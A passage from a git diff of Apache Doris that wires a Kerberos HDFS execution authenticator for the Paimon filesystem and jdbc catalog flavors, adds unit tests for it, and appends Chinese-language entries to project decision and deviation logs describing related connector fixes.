PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + + Assertions.assertThrows(RuntimeException.class, () -> provider.resolveTable(handle)); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the scan resolveTable getTable seam runs"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void resolveTableEntersAuthenticatorOnHappyPath() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops, ctx); + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.emptyList(), Collections.emptyList()); + + provider.resolveTable(handle); // null transient -> reload via the wrapped seam + Assertions.assertEquals(Collections.singletonList("getTable:db1.t1"), ops.log); + Assertions.assertEquals(1, ctx.authCount); + } + /** Builds a native-eligible RawFile (parquet suffix). The numeric fields are irrelevant to the * native-vs-JNI routing decision under test, only the path suffix matters. */ private static RawFile parquetRawFile(String path) { diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java index f52254711ce752..1f028e151a0aa3 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalCatalog.java @@ -127,6 +127,11 @@ protected synchronized void initPreExecutionAuthenticator() { try { MetastoreProperties msp = catalogProperty.getMetastoreProperties(); if (msp != null) { + // Wire any storage-derived authenticator first (rereview2 M-8): the paimon + // filesystem/jdbc flavors build their HDFS Kerberos authenticator from the catalog's + // storage properties here, because their legacy initializeCatalog() — which did this — + // is dead on the plugin/cutover path. Default no-op for every other metastore type. + msp.initExecutionAuthenticator(catalogProperty.getOrderedStoragePropertiesList()); executionAuthenticator = msp.getExecutionAuthenticator(); return; } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/AbstractPaimonProperties.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/AbstractPaimonProperties.java index 9c9631a516fdac..44bee7fc03dfd5 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/AbstractPaimonProperties.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/AbstractPaimonProperties.java @@ -18,6 +18,8 @@ package org.apache.doris.datasource.property.metastore; import org.apache.doris.common.security.authentication.ExecutionAuthenticator; +import org.apache.doris.common.security.authentication.HadoopExecutionAuthenticator; +import org.apache.doris.datasource.property.storage.HdfsProperties; import org.apache.doris.datasource.property.storage.StorageProperties; import org.apache.doris.foundation.property.ConnectorProperty; @@ -60,6 +62,27 @@ protected AbstractPaimonProperties(Map props) { public abstract Catalog initializeCatalog(String catalogName, List storagePropertiesList); + /** + * Builds the HDFS Kerberos {@link ExecutionAuthenticator} from the catalog's storage properties, + * mirroring what {@code initializeCatalog} does for the legacy path. Shared by the filesystem and + * jdbc flavors' {@link #initExecutionAuthenticator} override so the plugin/cutover path wires a + * real {@code doAs} authenticator (the legacy {@code initializeCatalog} that did this is dead on + * that path). No-op when there is no HDFS storage (e.g. an S3-backed warehouse) — leaving the + * base no-op authenticator, which is correct (no Kerberos UGI to apply). + */ + protected void initHdfsExecutionAuthenticator(List storagePropertiesList) { + if (storagePropertiesList == null) { + return; + } + for (StorageProperties sp : storagePropertiesList) { + if (sp.getType() == StorageProperties.Type.HDFS) { + this.executionAuthenticator = new HadoopExecutionAuthenticator( + ((HdfsProperties) sp).getHadoopAuthenticator()); + return; + } + } + } + protected void appendCatalogOptions() { if (StringUtils.isNotBlank(warehouse)) { catalogOptions.set(CatalogOptions.WAREHOUSE.key(), warehouse); diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/MetastoreProperties.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/MetastoreProperties.java index 3a39fdd3927406..28310dfaa555a6 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/MetastoreProperties.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/MetastoreProperties.java @@ -20,6 +20,7 @@ import org.apache.doris.common.UserException; import org.apache.doris.common.security.authentication.ExecutionAuthenticator; import org.apache.doris.datasource.property.ConnectionProperties; +import org.apache.doris.datasource.property.storage.StorageProperties; import lombok.Getter; import org.apache.commons.lang3.StringUtils; @@ -139,4 +140,21 @@ protected MetastoreProperties(Map props) { public ExecutionAuthenticator getExecutionAuthenticator() { return NOOP_AUTH; } + + /** + * Wires an {@link ExecutionAuthenticator} that is derived from the catalog's storage properties, + * for metastore types whose authenticator cannot be built at {@link #initNormalizeAndCheckProps()} + * time (which has no storage-properties context). + * + *

      The default is a no-op: most metastore types either build their authenticator in + * {@code initNormalizeAndCheckProps} (e.g. HMS, from its hive props) or have none. The Paimon + * filesystem/jdbc flavors override this to build the HDFS Kerberos authenticator from the + * HDFS {@code StorageProperties} — mirroring what legacy did inside {@code initializeCatalog} + * (which is dead on the plugin/cutover path). Invoked once on catalog init by + * {@code PluginDrivenExternalCatalog.initPreExecutionAuthenticator}, before + * {@link #getExecutionAuthenticator()} is read.

      + */ + public void initExecutionAuthenticator(java.util.List storagePropertiesList) { + // no-op by default + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStoreProperties.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStoreProperties.java index df0ebae97490a8..8acf12b2056bc2 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStoreProperties.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStoreProperties.java @@ -56,6 +56,17 @@ public Catalog initializeCatalog(String catalogName, List sto } } + /** + * Wires the HDFS Kerberos authenticator on the plugin/cutover path (rereview2 M-8). Legacy set + * it inside {@link #initializeCatalog}, which is dead on that path, so the runtime authenticator + * stayed the base no-op and {@code doAs} was silently lost over Kerberized HDFS. Mirrors HMS, + * which sets its authenticator in {@code initNormalizeAndCheckProps}. + */ + @Override + public void initExecutionAuthenticator(List storagePropertiesList) { + initHdfsExecutionAuthenticator(storagePropertiesList); + } + @Override protected void appendCustomCatalogOptions() { //nothing need to do diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStoreProperties.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStoreProperties.java index 7568d59c5fed33..9bd9870718d597 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStoreProperties.java +++ b/fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStoreProperties.java @@ -134,6 +134,17 @@ public Catalog initializeCatalog(String catalogName, List sto } } + /** + * Wires the HDFS Kerberos authenticator on the plugin/cutover path (rereview2 M-8). Legacy set + * it inside {@link #initializeCatalog}, which is dead on that path, so the runtime authenticator + * stayed the base no-op and {@code doAs} was silently lost over Kerberized HDFS. Mirrors HMS, + * which sets its authenticator in {@code initNormalizeAndCheckProps}. + */ + @Override + public void initExecutionAuthenticator(List storagePropertiesList) { + initHdfsExecutionAuthenticator(storagePropertiesList); + } + @Override protected void appendCustomCatalogOptions() { catalogOptions.set(CatalogOptions.URI.key(), uri); diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStorePropertiesTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStorePropertiesTest.java index fa52316357dd57..abc28709b0184e 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStorePropertiesTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStorePropertiesTest.java @@ -47,6 +47,28 @@ public void testKerberosCatalog() throws Exception { ); } + @Test + public void testInitExecutionAuthenticatorWiresHdfsAuthenticatorWithoutInitializeCatalog() throws Exception { + Map props = new HashMap<>(); + props.put("fs.defaultFS", "file:///tmp"); + props.put("type", "paimon"); + props.put("paimon.catalog.type", "filesystem"); + props.put("warehouse", "file:///tmp"); + PaimonFileSystemMetaStoreProperties paimonProps = + (PaimonFileSystemMetaStoreProperties) MetastoreProperties.create(props); + // M-8: before wiring, the runtime authenticator is the base no-op — filesystem only set the + // real authenticator inside initializeCatalog(), which is DEAD on the plugin/cutover path, so + // doAs was silently lost over Kerberized HDFS. This assertion pins the bug. + Assertions.assertNotEquals(HadoopExecutionAuthenticator.class, + paimonProps.getExecutionAuthenticator().getClass()); + // The fix: initExecutionAuthenticator builds the HDFS authenticator from the storage props at + // catalog-init time (the path PluginDrivenExternalCatalog now invokes), WITHOUT initializeCatalog. + // MUTATION: removing the filesystem initExecutionAuthenticator override leaves the no-op -> red. + paimonProps.initExecutionAuthenticator(StorageProperties.createAll(props)); + Assertions.assertEquals(HadoopExecutionAuthenticator.class, + paimonProps.getExecutionAuthenticator().getClass()); + } + @Test public void testNonKerberosCatalog() throws Exception { Map props = new HashMap<>(); diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStorePropertiesTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStorePropertiesTest.java index cd430d8a631f13..664a38f7334bf7 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStorePropertiesTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStorePropertiesTest.java @@ -18,7 +18,9 @@ package org.apache.doris.datasource.property.metastore; import org.apache.doris.catalog.JdbcResource; +import org.apache.doris.common.security.authentication.HadoopExecutionAuthenticator; import org.apache.doris.datasource.paimon.PaimonExternalCatalog; +import org.apache.doris.datasource.property.storage.StorageProperties; import org.apache.paimon.options.CatalogOptions; import org.junit.jupiter.api.Assertions; @@ -52,6 +54,28 @@ public void testBasicJdbcProperties() throws Exception { Assertions.assertEquals("secret", jdbcProps.getCatalogOptions().get("jdbc.password")); } + @Test + public void testInitExecutionAuthenticatorWiresHdfsAuthenticatorWithoutInitializeCatalog() throws Exception { + Map props = new HashMap<>(); + props.put("type", "paimon"); + props.put("paimon.catalog.type", "jdbc"); + props.put("uri", "jdbc:mysql://localhost:3306/paimon"); + props.put("warehouse", "file:///tmp"); + props.put("fs.defaultFS", "file:///tmp"); + PaimonJdbcMetaStoreProperties jdbcProps = + (PaimonJdbcMetaStoreProperties) MetastoreProperties.create(props); + // M-8: like filesystem, the jdbc flavor only set the real authenticator inside the now-dead + // initializeCatalog(), so the cutover path kept the base no-op and lost doAs over Kerberized + // HDFS. This assertion pins the bug. + Assertions.assertNotEquals(HadoopExecutionAuthenticator.class, + jdbcProps.getExecutionAuthenticator().getClass()); + // The fix wires the HDFS authenticator from the storage props WITHOUT initializeCatalog. + // MUTATION: removing the jdbc initExecutionAuthenticator override leaves the no-op -> red. + jdbcProps.initExecutionAuthenticator(StorageProperties.createAll(props)); + Assertions.assertEquals(HadoopExecutionAuthenticator.class, + jdbcProps.getExecutionAuthenticator().getClass()); + } + @Test public void testJdbcPrefixPassthrough() throws Exception { Map props = new HashMap<>(); diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 6d299cbb9b43aa..22577f95c933e1 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,8 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-053 | P5-fix#6 | **FIX-KERBEROS-DOAS / M-8(MAJOR,Kerberos-only,fe-core,filesystem+jdbc)= fix-now(用户签字,2026-06-11)**:翻闸后 filesystem/jdbc flavor 在 Kerberized HDFS 上丢 UGI `doAs`——连接器 `PaimonConnector.createCatalog` 已把建 catalog 包进 `context.executeAuthenticated`(:194),但其背后 authenticator 对这两 flavor 是**基类 no-op**:HDFS `HadoopExecutionAuthenticator` 仅在 `initializeCatalog()` 内构建(`PaimonFileSystemMetaStoreProperties:46`/`PaimonJdbcMetaStoreProperties:120`),而 `initializeCatalog` 在翻闸路径**死代码**(唯一 live 调用方=legacy `PaimonExternalCatalog:147`;plugin 路径经 `PaimonCatalogFactory` 自建 catalog)→ `PluginDrivenExternalCatalog.initPreExecutionAuthenticator:130` 读到 `AbstractPaimonProperties:45` 的 no-op → `executeAuthenticated` 不 doAs。HMS 不受影响(authenticator 在 `initNormalizeAndCheckProps:70` 即建、必跑)。**作用域=filesystem+jdbc only**(用户签):DLF/REST 排除——`PaimonAliyunDLFMetaStoreProperties` 从不设 authenticator、用 Aliyun AK/SK/STS 入 HiveConf 非 Kerberos UGI(无 doAs 可丢),故 review「DLF」从句 **overstated**;HMS 已对。**修=fe-core,零连接器改/零连接器-SPI**:新 fe-core hook `MetastoreProperties.initExecutionAuthenticator(List)`(default no-op)由 `PluginDrivenExternalCatalog.initPreExecutionAuthenticator` 用**已安全建好**的 `catalogProperty.getOrderedStoragePropertiesList()` 调(catalog-init 时机、与 legacy 同、避免每次 `MetastoreProperties.create` eager 重复 kerberos login);filesystem/jdbc override 之经 `AbstractPaimonProperties.initHdfsExecutionAuthenticator` 共享 helper 从 HDFS `StorageProperties` 建 authenticator(镜像 HMS)。**FE-unit 可测 wiring**(断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator`、不调 initializeCatalog),**真 doAs 端到端=live-Kerberos-e2e only**(无 paimon-kerberos regression 套件,[DV-031](./deviations-log.md))。守门:fe-core `Paimon{FileSystem,Jdbc}MetaStorePropertiesTest` 14/0/0、fail-before 双 red(no-op `AbstractPaimonProperties$1`)、checkstyle 0。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) | 2026-06-11 | ✅ | +| D-052 | P5-fix#6 | **FIX-KERBEROS-DOAS / M-11(MAJOR,Kerberos-HMS)= full legacy parity 包全部 read RPC(用户签字,2026-06-11,取代 D7=B 的 read 从句)**:翻闸后连接器 metadata **读** RPC(listDatabases/getDatabase/listTables/getTable[getTableHandle+getSysTableHandle+resolveTable]/listPartitions)**不**包 `executeAuthenticated`,仅 4 个 DDL op 包(B3 **D7=B** 故意 read-vs-DDL 不对称、把 read-path doAs 推给 live-e2e 门)→ Kerberos HMS 上 SHOW PARTITIONS/MTMV/partitions-TVF + 任何 getTable 读 RPC 跑在 catalog principal 之外。legacy `PaimonMetadataOps`/`PaimonExternalCatalog` 包**每个** read(`getPaimonPartitions:99`、`getPaimonTable:137`、listDatabases/listTables/getDatabase)。**用户定 = full legacy parity(vs 仅包 listPartitions / vs defer)**:仅包 listPartitions 是半吊子(连分区路径自身先行的 getTable reload 都漏);defer 则须登 accepted-deviation。本签字**取代 D7=B 的 read-path 从句**(4 DDL op 仍包)。**修=连接器 only、零 SPI**:7 处 read site 包 `context.executeAuthenticated`,其中 `resolveTable`(metadata + scan 双 site)一处包覆盖所有 resolveTable 调用方(DRY)。**异常流关键**:Kerberos `UGI.doAs` 把抛出的 checked `Catalog.{Table,Database}NotExistException` 包成 `UndeclaredThrowableException`(仅 IOException/RuntimeException/Error 透传)→ 故 domain 异常**必须在 lambda 内**捕获(镜像 legacy `getPaimonPartitions:104`),listDatabases/resolveTable 的既有 catch-all 在外吸收。scan `resolveTable` 对 `context==null`(2-arg ctor 离线测)走直连,与同文件 `getScanNodeProperties` 既有 null-context 约定一致。守门:连接器模块 248/0/0(1 CI-gated skip)、新 `PaimonConnectorMetadataReadAuthTest` 12/0/0 + scan 2、fail-before 3 red(authCount/log-empty)、import-gate 净、checkstyle 0。真值闸=live Kerberos HMS e2e(CI-gated、无套件,[DV-031](./deviations-log.md))。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) | 2026-06-11 | ✅ | | D-051 | P5-fix#5 | **FIX-MAPPING-FLAG-KEYS(M-crit MAJOR,纯连接器/FE-wiring,无 BE/无 SPI)作用域 = paimon-only 修 + hive/iceberg 跨连接器 follow-up(用户签字,2026-06-11)**:翻闸后 paimon 连接器类型映射两开关**静默失效**——连接器读**下划线**键 `enable_mapping_binary_as_varbinary`/`enable_mapping_timestamp_tz`(`PaimonConnectorProperties:39,42`→`PaimonConnectorMetadata.buildTypeMappingOptions`),但 fe-core 只写**点分**键 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz`(`CatalogProperty:50,52`;`ExternalCatalog.setDefaultPropsIfMissing:302-306` 仅写点分键;`HIDDEN_PROPERTIES` 仅藏点分键)→ `PluginDrivenExternalCatalog.createConnectorFromProperties` 把**原始** catalog map 原样喂连接器 → `getOrDefault(下划线,"false")` 恒 false → 即便用户在 CREATE CATALOG 开启,BINARY 仍→STRING、LTZ 仍→DATETIMEV2(legacy `PaimonExternalTable:350` 读点分键并 honor → cutover 回归,flag 启用前 latent)。binary 键**双重漂移**(分隔符 `.`→`_` 且 token `varbinary`→`binary_as_varbinary`)→ 通用归一化器修不了。**M-crit 是 critic-surfaced 未过 3-lens → 先独立复核**(5-agent scout + 对抗 synthesizer workflow `wf_a3626c54-0db` → REAL_BUG high-conf,false-positive steelman 被否:原始 feature PR #57821/#59720、全 regression CREATE CATALOG(paimon/iceberg/hive/jdbc 皆点分)、legacy parity、同 SPI PR 迁移的 JDBC 连接器正确保点分 `JdbcConnectorProperties:66-67` 均证点分为 canonical)。**修(纯连接器、零 SPI/BE)**:`PaimonConnectorProperties` 两常量重指 canonical 点分键(binary 常量并改名 `ENABLE_MAPPING_VARBINARY` 对齐 CatalogProperty/JDBC/iceberg 约定,同修分隔符+token)+ 更新 `PaimonConnectorMetadata` 一处引用;`Options(mapBinaryToVarbinary,mapTimestampTz)` 顺序本就对、无逻辑改。**BE 一致性已核**:`PluginDrivenScanNode extends FileQueryScanNode` 不 override mapping getter → BE scan param 经继承的 `getEnableMappingVarbinary/Tz` 本就读点分键(`FileQueryScanNode:192-193,635-678`),故修连接器 FE 侧读后 FE 列型与 BE scan param 一致(修前两侧分歧)。**用户定 = paimon-only**(vs 一次修全 3 连接器)→ hive/iceberg 同根因登 [DV-030](./deviations-log.md) 跨连接器 follow-up(hive `enable_mapping_binary_as_string` 是误名非语义反转)。否决 fe-core 归一化器(blast 大/破 JDBC 已正确读点分/对 paimon 双重漂移不足)。守门:模块 234/0/0(1 CI-gated skip)、checkstyle 0、import-gate 净、fail-before bug-catcher 向红(期望 VARBINARY 实得 STRING)+guard 两态绿。真值闸=`test_paimon_catalog_{varbinary,timestamp_tz}.groovy`(CI-gated,enablePaimonTest=false+外部 fixture)。设计 [`P5-fix-MAPPING-FLAG-KEYS-design.md`](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md) | 2026-06-11 | ✅ | | D-050 | P5-fix#4 | **FIX-JDBC-DRIVER-URL(B-8a BLOCKER + B-8b 安全)作用域 = CREATE-time 校验 parity(用户签字,2026-06-11)**:JDBC flavor 连接器(a)`PaimonScanPlanProvider.getBackendPaimonOptions` 把 `driver_url` **裸**转发给 BE 且 `startsWith("jdbc.")` filter 丢 `paimon.jdbc.*` 别名 → BE `JdbcDriverUtils.registerDriver` 的 `new URL("mysql.jar")` 抛 `MalformedURLException`(B-8a 功能 BLOCKER);(b)driver_url 无 format/allow-list/secure-path 校验 + stale「paimon 不在 SPI_READY_TYPES」注释(B7 后已假,`CatalogFactory:51` 含 paimon)(B-8b 安全)。**修 = 纯连接器、零新 SPI**(复用既有 `Connector.preCreateValidation` + `ConnectorValidationContext.validateAndResolveDriverPath`):B-8a 在 `getBackendPaimonOptions` 用 `firstNonBlank(JDBC_DRIVER_URL)` 认两别名 + 抽出共享 `PaimonCatalogFactory.resolveDriverUrl`(FE 注册与 BE 选项同解析)发 canonical `jdbc.driver_url`(resolved)+`jdbc.driver_class`(镜像 legacy `PaimonJdbcMetaStoreProperties.getBackendPaimonOptions`);B-8b override `PaimonConnector.preCreateValidation` 对 jdbc flavor 调 `validateAndResolveDriverPath`(镜像 `JdbcDorisConnector`)+ 删 stale 注释。**4-lens clean-room review 确认 B-8a + CREATE-time B-8b 正确**,揪出**校验仅 CREATE-time**(FE-restart reload/ALTER CATALOG/scan-time 不复校)= **pre-existing fe-core 缝、所有 plugin 连接器共有(含 JDBC 参考连接器)、默认配置 permissive 无可绕**,legacy 更强(每 scan 经 getFullDriverUrl 复校)。**用户定 = 接受 CREATE-time parity**(vs 扩到 fe-core ALTER hook + scan-time 校验 SPI——触 fe-core+全连接器+ALTER 可能触发 BE 连通测,非 surgical)→ 登 [DV-028](./deviations-log.md)(CREATE-time-only 校验 gap + 跨连接器 follow-up)+ [DV-029](./deviations-log.md)(简化 resolver + BE-side user/password/uri 别名 out-of-scope)。守门:模块 232/0/0、checkstyle 0、import-gate 净、fail-before 5/9 向红。真值闸=`test_paimon_jdbc_catalog`(CI-gated)。设计 [`P5-fix-JDBC-DRIVER-URL-design.md`](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) | 2026-06-11 | ✅ | | D-049 | P5-fix#3 | **FIX-SCHEMA-EVOLUTION(B-1a BLOCKER + M-10 MAJOR)= Design C「连接器直建 thrift schema 字典」(用户签字,2026-06-11;M-10 deferred)**:翻闸后 native(ORC/Parquet) 读丢 paimon schema-evolution——连接器只发 per-file `TPaimonFileDesc.schema_id`、从不设 scan 级 `TFileScanRangeParams.current_schema_id`/`history_schema_info` → BE `table_schema_change_helper.h:219-237` 走 `!__isset` 分支退化**名匹配** → schema-evolved(改名/重排)表旧 schema 文件**静默错行/读 NULL**(JNI 路不受影响、native 是默认)。**关键事实**(5 层 trace + BE `table_schema_change_helper.cpp:312-430`):field-id 匹配路 BE 只读 `TField.{id,name,type.type 当 nested-vs-scalar tag}`、**从不读 Doris Type 也不读 tuple descriptor** → 连接器可**直建** `TSchema`(`org.apache.doris.thrift.*` import-legal)、**无需 Doris Type/无新 SPI**;`Column.uniqueId`(M-10) 仅当 FE 从 Doris 列建 history 才有关、直接从 paimon `DataField.id()` 建则 B-1a 独立于 M-10。**用户定 = Design C(vs Design B「穿 ConnectorColumn/ConnectorType field-id + fe-core ExternalUtil 建」)**:连接器在 `getScanNodeProperties` 从 live(snapshot-pinned)表建 `current_schema_id=-1`+`history_schema_info`(-1 entry=pinned schema、外加每个 `SchemaManager.listAllIds()` 提交 schema)→ base64 thrift carrier prop 经既有 `populateScanLevelParams` SPI hook(复用 DV-006 同缝)落 params。**零新 SPI surface**(task-list 原标「SPI?=yes」修正为 no)、连接器局部、最小 blast radius;M-10(`Column.uniqueId=-1`)**deferred**(rereview2 §4 已证伪 standalone repro、无消费者,[DV-026](./deviations-log.md))。**3-lens clean-room review 揪出 2 真 BLOCKER(均在 -1 entry,已修+复验 clean)**:① 列名 casing(BE verbatim key vs lowercase slot name + `current_schema_id=-1` 永不走 ConstNode 快路 → 大小写混合列即崩、连未演化表都回归)→ 修 = -1 entry **只** lowercase 顶层名(default-locale,byte-match slot 产出方+legacy `parseSchema:507`;嵌套 struct 名保 paimon-case=legacy `PaimonUtil:302` 非对称);② 时间旅行(-1 entry 取 `schemaManager.latest()` 绝对最新、但 tuple 用 pinned schema → 改名列崩/错行)→ 修 = -1 entry 取 `((FileStoreTable)table).schema()`(pinned)、guard `DataTable`→`FileStoreTable`。MINOR(eager 读全 schema 无 cache)= 接受的 fail-loud 偏差 [DV-027](./deviations-log.md)。守门:模块 222/0/0(+5 schema-evo UT)、checkstyle 0、import-gate 净。真值闸=`test_paimon_full_schema_change.groovy`(CI-gated)。设计 [`P5-fix-SCHEMA-EVOLUTION-design.md`](./tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md) | 2026-06-11 | ✅ | diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index db71a3e65b7b4d..338287a9527155 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,11 @@ ## 📋 索引 -> 时间倒序;当前共 **30** 项。 +> 时间倒序;当前共 **31** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-031 | P5-fix#6 FIX-KERBEROS-DOAS 两接受项:① **真 doAs 端到端 = live-Kerberos-e2e only**——M-8(filesystem/jdbc over Kerberized HDFS)+ M-11(Kerberos HMS read RPC)的 FE-unit 测只覆盖 **wiring**(M-8 断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator` 类型、不调 initializeCatalog;M-11 用 `RecordingConnectorContext.failAuth`/`authCount` 断言 read 经 `executeAuthenticated`),**无 paimon-kerberos regression 套件**(现有 `regression-test/.../kerberos/` 4 套仅 hive+iceberg、gated by `enableKerberosTest`)→ 真 KDC doAs 留给 live-e2e 门(翻闸前必验)。fail-safe:非 Kerberos 部署 no-op authenticator 与真 authenticator 行为一致(`ExecutionAuthenticator.execute`=`task.call()`)、无回归。② **跨连接器 follow-up**:read-vs-DDL doAs 缺口(M-11)+ 翻闸-authenticator-wiring 缺口(M-8,`initializeCatalog` 死代码)在 hudi/iceberg full-adopter **同样复发**(`cutover-fe-dispatch-gap` 姊妹);与 [DV-028](#4 CREATE-time-only 校验)/[DV-030](#5 mapping-flag 键)同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝,将来可批量 close。**M-8 新增 fe-core `MetastoreProperties.initExecutionAuthenticator` hook 是 fe-core 内部扩展、非连接器 SPI**(`ConnectorContext`/`Connector` 表面未改)→ 01-spi-extensions-rfc.md 无须改 | [task-list #6](./task-list-P5-rereview2-fixes.md) / [P5-fix-KERBEROS-DOAS 设计](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) / [D-052](./decisions-log.md) / [D-053](./decisions-log.md) | 2026-06-11 | 🟢 已登记(live-e2e 真值闸 + 跨连接器 follow-up)| | DV-030 | P5-fix#5 FIX-MAPPING-FLAG-KEYS 跨连接器 follow-up(用户定本轮 paimon-only):**新 hive + iceberg 连接器同根因**——读**下划线** mapping-flag 键而 fe-core 只写/读/藏**点分** catalog 键(`CatalogProperty:50,52`),`PluginDrivenExternalCatalog.createConnectorFromProperties` 喂原始 catalog map、中间无点分→下划线归一化 → 用户在 CREATE CATALOG 开 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz` 对 hive/iceberg 亦**静默失效**(BINARY→STRING、LTZ→DATETIMEV2)。**iceberg** = `enable_mapping_varbinary`/`enable_mapping_timestamp_tz`(`IcebergConnectorProperties:46,47`→`IcebergConnectorMetadata:151,154`),仅分隔符差、语义不反转。**hive** = `enable_mapping_binary_as_string`/`enable_mapping_timestamp_tz`(`HiveConnectorProperties:52,53`→`HiveConnectorMetadata:317,319`),binary 键既改分隔符又改 token,但 `binary_as_string` 是**误名非语义反转**(`HmsTypeMapping:90-93` true→VARBINARY,喂 `mapBinaryToVarbinary` 字段)。JDBC 是唯一正确的新连接器(点分)。legacy hive/iceberg 经 `getCatalog().getEnableMappingVarbinary()` 读点分(`HMSExternalTable:791`/`IcebergUtils:1083`)→ 翻闸回归。**用户签 [D-051] = 本轮只修 paimon**(保 commit surgical、单任务);**follow-up(close 时)**:hive+iceberg 两常量重指 canonical 点分键(hive `binary_as_string` token 复原为 `varbinary`,**勿**反转 boolean)+ 各加 dotted-key honor UT;与 paimon #5 同形修。scope 经验证 workflow `wf_a3626c54-0db`(g5 + synthesizer,静态 trace 未 live) | [task-list #5](./task-list-P5-rereview2-fixes.md) / [P5-fix-MAPPING-FLAG-KEYS 设计](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md) / [D-051](./decisions-log.md) | 2026-06-11 | 🟡 待修(跨连接器 follow-up,用户定本轮 paimon-only)| | DV-028 | P5-fix#4 FIX-JDBC-DRIVER-URL:driver_url 安全校验**仅 CREATE CATALOG**(`PaimonConnector.preCreateValidation`→`ConnectorValidationContext.validateAndResolveDriverPath`),**FE-restart reload / ALTER CATALOG / scan-time 不复校**——与 legacy 分歧(legacy `getBackendPaimonOptions`→`JdbcResource.getFullDriverUrl` 每 scan 复校 format/whitelist/secure-path)。根因 = pre-existing **fe-core 架构缝**、非本 fix/非 paimon 专属:`CatalogFactory:164` replay(`isReplay=true`) 跳 `checkWhenCreating`→`preCreateValidation` 不跑;`PluginDrivenExternalCatalog.checkProperties`(ALTER 路) 只调 `validateProperties`(无 driver 校验)、不调 `preCreateValidation`;`getBackendPaimonOptions` 仅 resolve 不 validate(连接器 scan-time 只有 `ConnectorContext`、无 driver-path 校验 hook)。**与 JDBC 参考连接器 `JdbcDorisConnector` 完全 parity**(其亦 CREATE-time-only)。**用户定接受**([D-050]):默认配置 permissive(`secure_path="*"`/whitelist 空)无可绕,唯一暴露 = 硬化部署后**收紧** whitelist/secure-path 又**不重建** catalog。**复评/follow-up(跨连接器)**:若需 close,须 fe-core 改(ALTER 路 `checkProperties`→`preCreateValidation`,注意会触发 JDBC 连接器的 BE 连通测)+ scan-time 校验须新 `ConnectorContext` SPI hook——影响全 plugin 连接器、独立工单 | [task-list #4](./task-list-P5-rereview2-fixes.md) / [P5-fix-JDBC-DRIVER-URL 设计](./tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md) / [D-050](./decisions-log.md) | 2026-06-11 | 🟢 已登记(CREATE-time parity,用户接受+跨连接器 follow-up)| | DV-029 | P5-fix#4 FIX-JDBC-DRIVER-URL 两 scope-out(surgical):① 连接器 `PaimonCatalogFactory.resolveDriverUrl` 是 legacy 